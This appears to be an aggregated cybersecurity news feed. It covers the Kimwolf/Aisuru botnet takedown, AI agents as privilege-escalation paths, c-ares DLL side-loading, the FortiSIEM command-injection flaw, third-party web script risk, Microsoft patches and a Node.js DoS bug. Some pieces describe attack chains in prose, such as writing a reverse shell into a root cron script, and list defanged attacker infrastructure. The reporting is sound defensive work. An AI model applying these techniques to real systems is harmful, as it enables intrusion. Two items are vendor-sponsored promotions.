2026-01-15 AI创业新闻

Researchers Null-Route Over 550 Kimwolf and Aisuru Botnet Command Servers

The Black Lotus Labs team at Lumen Technologies said it null-routed traffic to more than 550 command-and-control (C2) nodes associated with the AISURU/Kimwolf botnet since early October 2025. AISURU and its Android counterpart, Kimwolf, have emerged as some of the biggest botnets in recent times, capable of directing enslaved devices to participate in distributed denial-of-service (DDoS) attacks and relay malicious traffic for residential proxy services . Details about Kimwolf emerged last month when QiAnXin XLab published an exhaustive analysis of the malware, which turns compromised devices – mostly unsanctioned Android TV streaming devices – into a residential proxy by delivering a software development kit (SDK) called ByteConnect either directly or through sketchy apps that come pre-installed on them. The net result is that the botnet has expanded to infect more than 2 million Android devices with an exposed Android Debug Bridge (ADB) service by tunneling through residential proxy networks, thereby allowing the threat actors to compromise a wide swath of TV boxes.

A subsequent report from Synthient has revealed Kimwolf actors attempting to offload proxy bandwidth in exchange for upfront cash. Black Lotus Labs said it identified in September 2025 a group of residential SSH connections originating from multiple Canadian IP addresses based on its analysis of backend C2 for Aisuru at 65.108.5[.]46, with the IP addresses using SSH to access 194.46.59[.]169, which proxy-sdk.14emeliaterracewestroxburyma02132[.]su. It’s worth noting that the second-level domain surpassed Google in Cloudflare’s list of top 100 domains in November 2025, prompting the web infrastructure company to scrub it from the list . Then, in early October 2025, the cybersecurity company said it identified another C2 domain – greatfirewallisacensorshiptool.14emeliaterracewestroxburyma02132[.]su – that resolved to 104.171.170[.]21, an IP address belonging to Utah-based hosting provider Resi Rack LLC.

The company advertises itself as a “Premium Game Server Hosting Provider.” This link is crucial, as a recent report from independent security journalist Brian Krebs revealed how people behind various proxy services based on the botnets were peddling their warez on a Discord server called resi[.]to. This also includes Resi Rack’s co-founders, who are said to have been actively engaged in selling proxy services via Discord for nearly two years. The server, which has since disappeared, was owned by someone named “d” (assessed to be short for the handle “Dort”), with Snow believed to be the botmaster. “In early October, we observed a 300% surge in the number of new bots added to Kimwolf over a 7-day period, which was the start of an increase that reached 800,000 total bots by mid-month,” Black Lotus Labs said.

“Nearly all of the bots in this surge were found listed for sale on a single residential proxy service.” Subsequently, the Kimwolf C2 architecture was found to scan PYPROXY and other services for vulnerable devices between October 20, 2025, and November 6, 2025 – a behavior explained by the botnet’s exploitation of a security flaw in many proxy services that made it possible to interact with devices on the internal networks of residential proxy endpoints and drop the malware. This, in turn, turns the device into a residential proxy node, causing its public IP address (assigned by the Internet Service Provider) to be listed for rent on a residential proxy provider site. Threat actors, such as those behind these botnets, then lease access to the infected node and weaponize it to scan the local network for devices with ADB mode enabled for further propagation. “After one successful null route [in October 2025], we observed the greatfirewallisacensorshiptool domain move to 104.171.170[.]201, another Resi Rack LLC IP,” Black Lotus Labs noted.

“As this server stood up, we saw a large spike of traffic with 176.65.149[.]19:25565, a server used to host their malware. This was on a common ASN that was used by the Aisuru botnet at the same time.” The disclosure comes against the backdrop of a report from Chawkr that detailed a sophisticated proxy network containing 832 compromised KeeneticOS routers operating across Russian ISPs, such as Net By Net Holding LLC, VladLink, and GorodSamara. “The consistent SSH fingerprints and identical configurations across all 832 devices point toward automated mass exploitation, whether leveraging stolen credentials, embedded backdoors, or known security flaws in the router firmware,” it said . “Each compromised router maintains both HTTP (port 80) and SSH (port 22) access.” Given that these compromised SOHO routers function as residential proxy nodes, they provide threat actors with the ability to conduct malicious activities by blending into normal internet traffic.

This illustrates how adversaries are increasingly leveraging consumer devices as conduits for multi-stage attacks. “Unlike datacenter IPs or addresses from known hosting providers, these residential endpoints operate below the radar of most security vendor reputation lists and threat intelligence feeds,” Chawkr noted. “Their legitimate residential classification and clean IP reputation allow malicious traffic to masquerade as ordinary consumer activity, evading detection mechanisms that would immediately flag requests originating from suspicious hosting infrastructure or known proxy services.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

AI Agents Are Becoming Privilege Escalation Paths

AI agents have quickly moved from experimental tools to core components of daily workflows across security, engineering, IT, and operations. What began as individual productivity aids, like personal code assistants , chatbots, and copilots, has evolved into shared, organization-wide agents embedded in critical processes. These agents can orchestrate workflows across multiple systems, for example: An HR Agent that provisions or deprovisions accounts across IAM, SaaS apps, VPNs, and cloud platforms based on HR system updates. A Change Management Agent that validates a change request, updates configuration in production systems, logs approvals in ServiceNow, and updates documentation in Confluence.

A Customer Support Agent that retrieves customer context from CRM, checks account status in billing systems, triggers fixes in backend services, and updates the support ticket. To deliver value at scale, organizational AI agents are designed to serve many users and roles. They are granted broader access permissions, compared to individual users, in order to access the tools and data required to operate efficiently. The availability of these agents has unlocked real productivity gains: faster triage, reduced manual effort, and streamlined operations.

But these early wins come with a hidden cost. As AI agents become more powerful and more deeply integrated, they also become access intermediaries. Their wide permissions can obscure who is actually accessing what, and under which authority. In focusing on speed and automation, many organizations are overlooking the new access risks being introduced.

The Access Model Behind Organizational Agents Organizational agents are typically designed to operate across many resources, serving multiple users, roles, and workflows through a single implementation. Rather than being tied to an individual user, these agents act as shared resources that can respond to requests, automate tasks, and orchestrate actions across systems on behalf of many users. This design makes agents easy to deploy and scalable across the organization. To function seamlessly, agents rely on shared service accounts, API keys, or OAuth grants to authenticate with the systems they interact with.

These credentials are often long-lived and centrally managed, allowing the agent to operate continuously without user involvement. To avoid friction and ensure the agent can handle a wide range of requests, permissions are frequently granted broadly, covering more systems, actions, and data than any single user would typically require. While this approach maximizes convenience and coverage, these design choices can unintentionally create powerful access intermediaries that bypass traditional permission boundaries. Breaking the Traditional Access Control Model Organizational agents often operate with permissions far broader than those granted to individual users, enabling them to span multiple systems and workflows.

When users interact with these agents, they no longer access systems directly; instead, they issue requests that the agent executes on their behalf. Those actions run under the agent’s identity, not the user’s. This breaks traditional access control models, where permissions are enforced at the user level. A user with limited access can indirectly trigger actions or retrieve data they would not be authorized to access directly, simply by going through the agent.

Because logs and audit trails attribute activity to the agent, not the requester, this privilege escalation can occur without clear visibility, accountability, or policy enforcement. Organizational Agents Can Quietly Bypass Access Controls The risks of agent-driven privilege escalation often surface in subtle, everyday workflows rather than overt abuse. For example, a user with limited access to financial systems may interact with an organizational AI agent to “summarize customer performance.” The agent, operating with broader permissions, pulls data from billing, CRM, and finance platforms, returning insights that the user would not be authorized to view directly. In another scenario, an engineer without production access asks an AI agent to “fix a deployment issue.” The agent investigates logs, modifies configuration in a production environment, and triggers a pipeline restart using its own elevated credentials.

The user never touched production systems, yet production was changed on their behalf. In both cases, no explicit policy is violated. The agent is authorized, the request appears legitimate, and existing IAM controls are technically enforced. However, access controls are effectively bypassed because authorization is evaluated at the agent level, not the user level, creating unintended and often invisible privilege escalation.

The Limits of Traditional Access Controls in the Age of AI Agents Traditional security controls are built around human users and direct system access, which makes them poorly suited for agent-mediated workflows. IAM systems enforce permissions based on who the user is, but when actions are executed by an AI agent, authorization is evaluated against the agent’s identity, not the requester’s. As a result, user-level restrictions no longer apply. Logging and audit trails compound the problem by attributing activity to the agent’s identity, masking who initiated the action and why.

With agents, security teams have lost the ability to enforce least privilege, detect misuse, or reliably attribute intent, allowing privilege escalation to occur without triggering traditional controls. The lack of attribution also complicates investigations, slows incident response, and makes it difficult to determine intent or scope during a security event. Uncovering Privilege Escalation in Agent-Centric Access Models As organizational AI agents take on operational responsibilities across multiple systems, security teams need clear visibility into how agent identities map to critical assets such as sensitive data and operational systems. It’s essential to understand who is using each agent and whether gaps exist between a user’s permissions and the agent’s broader access, creating unintended privilege escalation paths.

Without this context, excessive access can remain hidden and unchallenged. Security teams must also continuously monitor changes to both user and agent permissions, as access evolves over time. This ongoing visibility is critical to identifying new escalation paths as they are silently introduced, before they can be misused or lead to security incidents. Securing Agents’ Adoption with Wing Security AI agents are rapidly becoming some of the most powerful actors in the enterprise.

They automate complex workflows, move across systems, and act on behalf of many users at machine speed. But that power becomes dangerous when agents are over-trusted. Broad permissions, shared usage, and limited visibility can quietly turn AI agents into privilege escalation paths and security blind spots. Secure agent adoption requires visibility, identity awareness, and continuous monitoring.

Wing provides the required visibility by continuously discovering which AI agents operate in your environment, what they can access, and how they are being used. Wing maps agent access to critical assets, correlates agent activity with user context, and detects gaps where agent permissions exceed user authorization. With Wing , organizations can embrace AI agents confidently, unlocking AI automation and efficiency without sacrificing control, accountability, or security. Found this article interesting?

This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Hackers Exploit c-ares DLL Side-Loading to Bypass Security and Deploy Malware

Security experts have disclosed details of an active malware campaign that’s exploiting a DLL side-loading vulnerability in a legitimate binary associated with the open-source c-ares library to bypass security controls and deliver a wide range of commodity trojans and stealers. “Attackers achieve evasion by pairing a malicious libcares-2.dll with any signed version of the legitimate ahost.exe (which they often rename) to execute their code,” Trellix said in a report shared with The Hacker News. “This DLL side-loading technique allows the malware to bypass traditional signature-based security defenses.” The campaign has been observed distributing a wide assortment of malware, such as Agent Tesla , CryptBot , Formbook , Lumma Stealer , Vidar Stealer , Remcos RAT , Quasar RAT , DCRat , and XWorm . Targets of the malicious activity include employees in finance, procurement, supply chain, and administration roles within commercial and industrial sectors like oil and gas and import and export, with lures written in Arabic, Spanish, Portuguese, Farsi, and English, suggesting the attacks are restricted to a specific region.

The attack hinges on placing a malicious version of the DLL in the same directory as the vulnerable binary, taking advantage of the fact that it’s susceptible to search order hijacking to execute the contents of the rogue DLL instead of its legitimate counterpart, granting the threat actor code execution capabilities. The “ahost.exe” executable used in the campaign is signed by GitKraken and is typically distributed as part of GitKraken’s Desktop application. An analysis of the artifact on VirusTotal reveals that it’s distributed under dozens of names, including, but not limited to, “RFQ_NO_04958_LG2049 pdf.exe,” “PO-069709-MQ02959-Order-S103509.exe,” “23RDJANUARY OVERDUE.INV.PDF.exe,” “sales contract po-00423-025_pdf.exe,” and “Fatura da DHL.exe,” indication the use of invoice and request for quote (RFQ) themes to trick users into opening it. “This malware campaign highlights the growing threat of DLL sideloading attacks that exploit trusted, signed utilities like GitKraken’s ahost.exe to bypass security defenses,” Trellix said.

“By leveraging legitimate software and abusing its DLL loading process, threat actors can stealthily deploy powerful malware such as XWorm and DCRat, enabling persistent remote access and data theft.” The disclosure comes as Trellix also reported a surge in Facebook phishing scams employing the Browser-in-the-Browser ( BitB ) technique to simulate a Facebook authentication screen and deceive unsuspecting users into entering their credentials. This works by creating a fake pop-up within the victim’s legitimate browser window using an iframe element, making it virtually impossible to differentiate between a genuine and bogus login page. “The attack often starts with a phishing email, which may be disguised as a communication from a law firm,” researcher Mark Joseph Marti said . “This email typically contains a fake legal notice regarding an infringing video and includes a hyperlink disguised as a Facebook login link.” As soon as the victim clicks on the shortened URL, they are redirected to a phony Meta CAPTCHA prompt that instructs victims to sign in to their Facebook account.

This, in turn, triggers a pop-up window that employs the BitB method to display a fake login screen designed to harvest their credentials. Other variants of the social engineering campaign leverage phishing emails claiming copyright violations, unusual login alerts, impending account shutdowns due to suspicious activity, or potential security exploits. These messages are designed to induce a false sense of urgency and lead victims to pages hosted on Netlify or Vercel to capture their credentials. There is evidence to suggest that the phishing attacks may have been ongoing since July 2025 .

“By creating a custom-built, fake login pop-up window within the victim’s browser, this method capitalizes on user familiarity with authentication flows, making credential theft nearly impossible to detect visually,” Trellix said. “The key shift lies in the abuse of trusted infrastructure, utilizing legitimate cloud hosting services like Netlify and Vercel, and URL shorteners to bypass traditional security filters and lend a false sense of security to phishing pages.” The findings coincide with the discovery of a multi-stage phishing campaign that exploits Python payloads and TryCloudflare tunnels to distribute AsyncRAT via Dropbox links pointing to ZIP archives containing an internet shortcut (URL) file. Details of the campaign were first documented by Forcepoint X-Labs in February 2025. “The initial payload, a Windows Script Host (WSH) file, was designed to download and execute additional malicious scripts hosted on a WebDAV server,” Trend Micro said .

“These scripts facilitated the download of batch files and further payloads, ensuring a seamless and persistent infection routine.” A standout aspect of the attack is the abuse of living-off-the-land (LotL) techniques that employ Windows Script Host, PowerShell, and native utilities, as well as Cloudflare’s free-tier infrastructure to host the WebDAV server and evade detection. The scripts staged on TryCloudflare domains are engineered to install a Python environment, establish persistence via Windows startup folder scripts, and inject the AsyncRAT shellcode into an “explorer.exe” process. In tandem, a decoy PDF is displayed to the victim as a distraction mechanism and misleads them into thinking that a legitimate document was accessed. “The AsyncRAT campaign analyzed in this report demonstrates the increasing sophistication of threat actors in abusing legitimate services and open-source tools to evade detection and establish persistent remote access,” Trend Micro said.

“By utilizing Python-based scripts and abusing Cloudflare’s free-tier infrastructure for hosting malicious payloads, the attackers successfully masked their activities under trusted domains, bypassing traditional security controls.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Fortinet Fixes Critical FortiSIEM Flaw Allowing Unauthenticated Remote Code Execution

Fortinet has released updates to fix a critical security flaw impacting FortiSIEM that could allow an unauthenticated attacker to achieve code execution on susceptible instances. The operating system (OS) injection vulnerability, tracked as CVE-2025-64155 , is rated 9.4 out of 10.0 on the CVSS scoring system. “An improper neutralization of special elements used in an OS command (‘OS command injection’) vulnerability [CWE-78] in FortiSIEM may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests,” the company said in a Tuesday bulletin. Fortinet said the vulnerability affects only Super and Worker nodes, and that it has been addressed in the following versions - FortiSIEM 6.7.0 through 6.7.10 (Migrate to a fixed release) FortiSIEM 7.0.0 through 7.0.4 (Migrate to a fixed release) FortiSIEM 7.1.0 through 7.1.8 (Upgrade to 7.1.9 or above) FortiSIEM 7.2.0 through 7.2.6 (Upgrade to 7.2.7 or above) FortiSIEM 7.3.0 through 7.3.4 (Upgrade to 7.3.5 or above) FortiSIEM 7.4.0 (Upgrade to 7.4.1 or above) FortiSIEM 7.5 (Not affected) FortiSIEM Cloud (Not affected) Horizon3.ai security researcher Zach Hanley, who is credited with discovering and reporting the flaw on August 14, 2025, said it comprises two moving parts - An unauthenticated argument injection vulnerability that leads to arbitrary file write, allowing for remote code execution as the admin user A file overwrite privilege escalation vulnerability that leads to root access and completely compromises the appliance Specifically, the problem has to do with how FortiSIEM’s phMonitor service – a crucial backend process responsible for health monitoring, task distribution, and inter-node communication via TCP port 7900 – handles incoming requests related to logging security events to Elasticsearch.

This, in turn, invokes a shell script with user-controlled parameters, thereby opening the door to argument injection via curl and achieving arbitrary file writes to the disk in the context of the admin user. This limited file write can be weaponized to achieve full system takeover by weaponizing the curl argument injection to write a reverse shell to “/opt/charting/redishb.sh,” a file that’s writable by an admin user and is executed every minute by the appliance by means of a cron job that runs with root-level permissions. In other words, writing a reverse shell to this file enables privilege escalation from admin to root, granting the attacker unfettered access to the FortiSIEM appliance. The most important aspect of the attack is that the phMonitor service exposes several command handlers that do not require authentication.

This makes it easy for an attacker to invoke these functions simply by obtaining network access to port 7900. Fortinet has also shipped fixes for another critical security vulnerability in FortiFone (CVE-2025-47855, CVSS score: 9.3) that could allow an unauthenticated attacker to obtain device configuration via a specially crafted HTTP(S) request to the Web Portal page. It impacts the following versions of the enterprise communications platform - FortiFone 3.0.13 through 3.0.23 (Upgrade to 3.0.24 or above) FortiFone 7.0.0 through 7.0.1 (Upgrade to 7.0.2 or above) FortiFone 7.2 (Not affected) Users are advised to update to the latest versions for optimal protection. As workarounds for CVE-2025-64155, Fortinet is recommending that customers limit access to the phMonitor port (7900).

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

New Research: 64% of 3rd-Party Applications Access Sensitive Data Without Justification

Research analyzing 4,700 leading websites reveals that 64% of third-party applications now access sensitive data without business justification, up from 51% in 2024. Government sector malicious activity spiked from 2% to 12.9%, while 1 in 7 Education sites show active compromise. Specific offenders: Google Tag Manager (8% of violations), Shopify (5%), Facebook Pixel (4%). Download the complete 43-page analysis → TL;DR A critical disconnect emerges in the 2026 research: While 81% of security leaders call web attacks a top priority, only 39% have deployed solutions to stop the bleeding.

Last year’s research found 51% unjustified access. This year it’s 64% — and accelerating into public infrastructure. What is Web Exposure? Gartner coined ‘Web Exposure Management’ to describe security risks from third-party applications: analytics, marketing pixels, CDNs, and payment tools.

Each connection expands your attack surface; a single vendor compromise can trigger a massive data breach by injecting code to harvest credentials or skim payments. This risk is fueled by a governance gap, where marketing or digital teams deploy apps without IT oversight. The result is chronic misconfiguration, where over-permissioned applications are granted access to sensitive data fields they don’t functionally need. This research analyzes exactly what data these third-party apps touch and whether they have a legitimate business justification.

Methodology Over 12 months (ending Nov. 2025), Reflectiz analyzed 4,700 leading websites using its proprietary Exposure Rating system. It analyzes the huge number of data points it gathers from scanning millions of websites by considering each risk factor in context, adds them together to create an overall level of risk, and expresses this as a simple grade, from A to F. Findings were supplemented by a survey of 120+ security leaders in the healthcare, finance, and retail sectors.

The Unjustified Access Crisis The report highlights a growing governance gap termed “unjustified access”: instances where third-party tools are granted access to sensitive data without a demonstrable business need. Access is flagged when a third-party script meets any of these criteria: Irrelevant Function: Reading data unnecessary for its task (e.g., a chatbot accessing payment fields). Zero-ROI Presence: Remaining active on high-risk pages despite 90+ days of zero data transmission. Shadow Deployment: Injection via Tag Managers without security oversight or “least privilege” scoping.

Over-Permissioning: Utilizing “Full DOM Access” to scrape entire pages rather than restricted elements. “Organizations are granting sensitive data access by default rather than exception.” This trend is most acute in Entertainment and Online Retail, where marketing pressures often override security reviews. The study identifies specific tools driving this exposure: Google Tag Manager: Accounts for 8% of all unjustified sensitive data access. Shopify: 5% of unjustified access.

Facebook Pixel: In 4% of analyzed deployments, the pixel was found to be over-permissioned, capturing sensitive input fields it did not require for functional tracking. This governance gap isn’t theoretical. A recent survey of 120+ security decision-makers from healthcare, finance, and retail found that 24% of organizations rely solely on general security tools like WAF, leaving them vulnerable to the specific third-party risks this research identified. Another 34% are still evaluating dedicated solutions, meaning 58% of organizations lack proper defenses despite recognizing the threat.

Critical Infrastructure Under Siege While the stats show massive spikes in Government and Education breaches, the cause is financial rather than technical. Government Sector: Malicious activity exploded from 2% to 12.9% . Education Sector: Signs of compromised sites quadrupled to 14.3% (1 in 7 sites) Insurance Sector : By contrast, this sector reduced malicious activity by 60%, dropping to just 1.3%. Budget-constrained institutions are losing the supply chain battle.

Private sectors with better governance budgets are stabilizing their environments. Survey respondents confirmed this: 34% cited budget constraints as their primary obstacle, while 31% pointed to lack of manpower – a combination that hits public institutions particularly hard. The Awareness-Action Gap Security leader survey findings expose organizational dysfunction: 81% call web attacks a priority → Only 39% deployed solutions 61% still evaluating or using inadequate tools → Despite 51% → 64% unjustified access surge Top obstacles: Budget (34%), regulation (32%), staffing (31%) Result: Awareness without action creates vulnerability at scale. The 42-point gap explains why unjustified access grows 25% year-over-year.

The Marketing Department Factor A key driver of this risk is the “Marketing Footprint.” The research found that Marketing and Digital departments now drive 43% of all third-party risk exposure, compared to just 19% created by IT. The report found that 47% of apps running in payment frames lack business justification. Marketing teams frequently deploy conversion tools into these sensitive environments without realizing the implications. Security teams recognize this threat: in the practitioner survey, 20% of respondents ranked supply chain attacks and third-party script vulnerabilities among their top three concerns.

Yet the organizational structure that would prevent these risks – unified oversight of third-party deployments – remains absent at most organizations. How a Pixel Breach Could Eclipse Polyfill.io With 53.2% ubiquity, the Facebook Pixel is a systemic single point of failure. The risk is not the tool, but unmanaged permissions: “Full DOM Access” and “Automatic Advanced Matching” transform marketing pixels into unintentional data scrapers. The Precedent: A compromise would be 5x larger than the 2024 Polyfill.io attack , exposing data across half the major web simultaneously.

Polyfill affected 100K sites over weeks; Facebook Pixel’s 53.2% ubiquity means 2.5M+ sites are compromised instantly. The Fix: Context-Aware Deployment. Restrict pixels to landing pages for ROI, but strictly block them from payment and credential frames where they lack business justification. What about TikTok pixel and other trackers?

Download the full report for more insights » Technical Indicators of Compromise For the first time, this research pinpoints technical signals that predict compromised sites. Compromised sites don’t always use malicious apps – they’re characterized by “noisier” configurations. Automated Detection Criteria: Recently Registered Domains: Domains registered within the last 6 months appear 3.8x more often on compromised sites. External Connections: Compromised sites connect to 2.7x more external domains (100 vs.

36). Mixed Content: 63% of compromised sites mix HTTPS/HTTP protocols. Benchmarks for Security Leaders Among the 4,700 analyzed sites, 429 demonstrated strong security outcomes. These organizations prove that functionality and security can coexist: ticketweb.uk: Only site meeting all 8 benchmarks (Grade A+) GitHub, PayPal, Yale University: Meeting 7 benchmarks (Grade A) The 8 Security Benchmarks: Leaders vs Average The benchmarks below represent achievable targets based on real-world performance, not theoretical ideals.

Leaders maintain ≤8 third-party apps, while average organizations struggle with 15-25. The difference isn’t resources – it’s governance. Here’s how they compare across all eight metrics: Three Quick Wins To Prioritize

Audit Trackers Inventory every pixel/tracker: Identify the owner and business justification Remove tools that can’t justify data access Priority fixes: Facebook Pixel: Disable ‘Automatic Advanced Matching’ on PII pages Google Tag Manager: Verify no payment page access Shopify: Review app permissions 2.

Implement Automated Monitoring Deploy runtime monitoring for: Sensitive field access detection (cards, SSNs, credentials) Real-time alerts for unauthorized collection CSP violation tracking

Address the Marketing-IT Divide Joint CISO + CMO review: Marketing tools in payment frames Facebook Pixel scoping (use Allow/Exclusion Lists) Tracker ROI vs. security risk Download the Full Report Get the complete 43-page analysis, including: ✅ Sector-by-sector risk breakdowns ✅ Complete list of high-risk third-party apps ✅ Year-over-year trend analysis ✅ Security leaders best practices DOWNLOAD THE FULL REPORT HERE Found this article interesting? This article is a contributed piece from one of our valued partners.

Microsoft Fixes 114 Windows Flaws in January 2026 Patch, One Actively Exploited

Microsoft on Tuesday rolled out its first security update for 2026 , addressing 114 security flaws, including one vulnerability that it said has been actively exploited in the wild. Of the 114 flaws, eight are rated Critical, and 106 are rated Important in severity. As many as 58 vulnerabilities have been classified as privilege escalation, followed by 22 information disclosure, 21 remote code execution, and five spoofing flaws. According to data collected by Fortra, the update marks the third-largest January Patch Tuesday after January 2025 and January 2022.

These patches are in addition to two security flaws that Microsoft has addressed in its Edge browser since the release of the December 2025 Patch Tuesday update, including a spoofing flaw in its Android app ( CVE-2025-65046 , 3.1) and a case of insufficient policy enforcement in Chromium’s WebView tag ( CVE-2026-0628 , CVSS score: 8.8). The vulnerability that has come under in-the-wild exploitation is CVE-2026-20805 (CVSS score: 5.5), an information disclosure flaw impacting Desktop Window Manager. The Microsoft Threat Intelligence Center (MTIC) and Microsoft Security Response Center (MSRC) have been credited with identifying and reporting the flaw. “Exposure of sensitive information to an unauthorized actor in Desktop Windows Manager (DWM) allows an authorized attacker to disclose information locally,” Microsoft said in an advisory.

“The type of information that could be disclosed if an attacker successfully exploited this vulnerability is a section address from a remote ALPC port, which is user-mode memory.” There are currently no details on how the vulnerability is being exploited, the scale of such efforts, and who may be behind the activity. “DWM is responsible for drawing everything on the display of a Windows system, which means it offers an enticing combination of privileged access and universal availability, since just about any process might need to display something,” Adam Barnett, lead software engineer at Rapid7, said in a statement. “In this case, exploitation leads to improper disclosure of an ALPC port section address, which is a section of user-mode memory where Windows components coordinate various actions between themselves.” Microsoft previously addressed an actively exploited zero-day flaw in DWM in May 2024 ( CVE-2024-30051 , CVSS score: 7.8), which was described as a privilege escalation flaw that was abused by multiple threat actors, in connection with the distribution of QakBot and other malware families. Satnam Narang, senior staff research engineer at Tenable, called DWM a “frequent flyer” on Patch Tuesday, with 20 CVEs patched in the library since 2022.

Jack Bicer, director of vulnerability research at Action1, said the vulnerability can be exploited by a locally authenticated attacker to disclose information, defeat address space layout randomization (ASLR), and other defenses. “Vulnerabilities of this nature are commonly used to undermine Address Space Layout Randomization (ASLR), a core operating system security control designed to protect against buffer overflows and other memory-manipulation exploits,” Kev Breen, senior director of cyber threat research at Immersive, told The Hacker News. “By revealing where code resides in memory, this vulnerability can be chained with a separate code execution flaw, transforming a complex and unreliable exploit into a practical and repeatable attack.” The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added the flaw to its Known Exploited Vulnerabilities ( KEV ) catalog, mandating Federal Civilian Executive Branch (FCEB) agencies to apply the latest fixes by February 3, 2026.

Another vulnerability of note concerns a security feature bypass impacting Secure Boot Certificate Expiration ( CVE-2026-21265 , CVSS score: 6.4) that could allow an attacker to undermine a crucial security mechanism that ensures that firmware modules come from a trusted source and prevent malware from being run during the boot process. In November 2025, Microsoft announced that it will be expiring three Windows Secure Boot certificates issued in 2011, effective June 2026, urging customers to update to their 2023 counterparts - Microsoft Corporation KEK CA 2011 (June 2026) - Microsoft Corporation KEK 2K CA 2023 (for signing updates to DB and DBX) Microsoft Windows Production PCA 2011 (October 2026) - Windows UEFI CA 2023 (for signing the Windows boot loader) Microsoft UEFI CA 2011 (June 2026) - Microsoft UEFI CA 2023 (for signing third-party boot loaders) and Microsoft Option ROM UEFI CA 2023 (for signing third-party option ROMs) “Secure Boot certificates used by most Windows devices are set to expire starting in June 2026. This might affect the ability of certain personal and business devices to boot securely if not updated in time,” Microsoft said. “To avoid disruption, we recommend reviewing the guidance and taking action to update certificates in advance.” The Windows maker also pointed out that the latest update removes Agere Soft Modem drivers “agrsm64.sys” and “agrsm.sys” that were shipped natively with the operating system.

The third-party drivers are susceptible to a two-year-old local privilege escalation flaw ( CVE-2023-31096 , CVSS score: 7.8) that could allow an attacker to gain SYSTEM permissions. In October 2025, Microsoft took steps to remove another Agere Modem driver called “ltmdm64.sys” following in-the-wild exploitation of a privilege escalation vulnerability ( CVE-2025-24990 , CVSS score: 7.8) that could permit an attacker to gain administrative privileges. Also high on the priority list should be CVE-2026-20876 (CVSS score: 6.7), a critical-rated privilege escalation flaw in Windows Virtualization-Based Security (VBS) Enclave, enabling an attacker to obtain Virtual Trust Level 2 (VTL2) privileges, and leverage it to subvert security controls, establish deep persistence, and evade detection. “It breaks the security boundary designed to protect Windows itself, allowing attackers to climb into one of the most trusted execution layers of the system,” Mike Walters, president and co-founder of Action1, said.

“Although exploitation requires high privileges, the impact is severe because it compromises virtualization-based security itself. Attackers who already have a foothold could use this flaw to defeat advanced defenses, making prompt patching essential to maintain trust in Windows security boundaries.” Software Patches from Other Vendors In addition to Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including — ABB Adobe Amazon Web Services AMD Arm ASUS Broadcom (including VMware) Cisco ConnectWise Dassault Systèmes D-Link Dell Devolutions Drupal Elastic F5 Fortinet Fortra Foxit Software FUJIFILM Gigabyte GitLab Google Android and Pixel Google Chrome Google Cloud Grafana Hikvision HP HP Enterprise (including Aruba Networking and Juniper Networks ) IBM Imagination Technologies Lenovo Linux distributions AlmaLinux , Alpine Linux , Amazon Linux , Arch Linux , Debian , Gentoo , Oracle Linux , Mageia , Red Hat , Rocky Linux , SUSE , and Ubuntu MediaTek Mitel Mitsubishi Electric MongoDB Moxa Mozilla Firefox and Firefox ESR n8n NETGEAR Node.js NVIDIA ownCloud QNAP Qualcomm Ricoh Samsung SAP Schneider Electric ServiceNow Siemens SolarWinds SonicWall Sophos Spring Framework Synology TP-Link Trend Micro , and Veeam Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Critical Node.js Vulnerability Can Cause Server Crashes via async_hooks Stack Overflow

Node.js has released updates to fix what it described as a critical security issue impacting “virtually every production Node.js app” that, if successfully exploited, could trigger a denial-of-service (DoS) condition. “Node.js/V8 makes a best-effort attempt to recover from stack space exhaustion with a catchable error, which frameworks have come to rely on for service availability,” Node.js’s Matteo Collina and Joyee Cheung said in a Tuesday bulletin. “A bug that only reproduces when async_hooks are used would break this attempt, causing Node.js to exit with 7 directly without throwing a catchable error when recursions in user code exhaust the stack space. This makes applications whose recursion depth is controlled by unsanitized input vulnerable to denial-of-service attacks.” At its core, the shortcoming stems from the fact that Node.js exits with code 7 (denoting an Internal Exception Handler Run-Time Failure ) instead of gracefully handling the exception when a stack overflow occurs in user code while async_hooks is enabled.

Async_hooks is a low-level Node.js API that allows developers to track the lifecycle of asynchronous resources, such as database queries, timers, or HTTP requests. The issue, Node.js said, impacts several frameworks and Application Performance Monitoring (APM) tools, including React Server Components, Next.js, Datadog, New Relic, Dynatrace, Elastic APM, and OpenTelemetry, owing to the use of AsyncLocalStorage , a component built atop the async_hooks module that makes it possible to store data throughout the lifetime of an asynchronous operation. It has been addressed in the following versions - Node.js 20.20.0 (LTS) Node.js 22.22.0 (LTS) Node.js 24.13.0 (LTS) Node.js 25.3.0 (Current) The problem also impacts all Node.js versions from 8.x, which was the first version with async_hooks, to 18.x. It’s worth noting that Node.js version 8.0.0, codenamed Carbon, was released on May 30, 2017.

However, these versions remain unpatched as they have reached end-of-life (EoL) status. The fix put in place detects stack overflow errors and re-throws them to user code instead of treating them as fatal. This is being tracked under the CVE identifier CVE-2025-59466 (CVSS score: 7.5). Despite the significant practical impact, Node.js said it’s treating the fix as only a mitigation owing to a couple of reasons - Stack space exhaustion is not part of the ECMAScript specification The V8 JavaScript engine does not treat it as a security issue Limitations with the “ uncaughtException “ handler, which is designed to be used as a last resort mechanism for exception handling “Although it is a bug fix for an unspecified behavior, we chose to include it in the security release because of its widespread impact on the ecosystem,” Node.js said.

“React Server Components, Next.js, and virtually every APM tool are affected. The fix improves developer experience and makes error handling more predictable.” In light of the severity of the vulnerability, users of the frameworks/tools and server hosting providers are recommended to update as soon as possible. Maintainers of libraries and frameworks are being recommended to apply more robust defenses to counter stack space exhaustion and ensure service availability. The disclosure comes as Node.js also released fixes for three other high-severity flaws (CVE-2025-55131, CVE-2025-55130, and CVE-2025-59465) that could be exploited to achieve data leakage or corruption, read sensitive files using crafted relative symbolic link (symlink) paths, and trigger a remote denial-of-service, respectively.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

PLUGGYAPE Malware Uses Signal and WhatsApp to Target Ukrainian Defense Forces

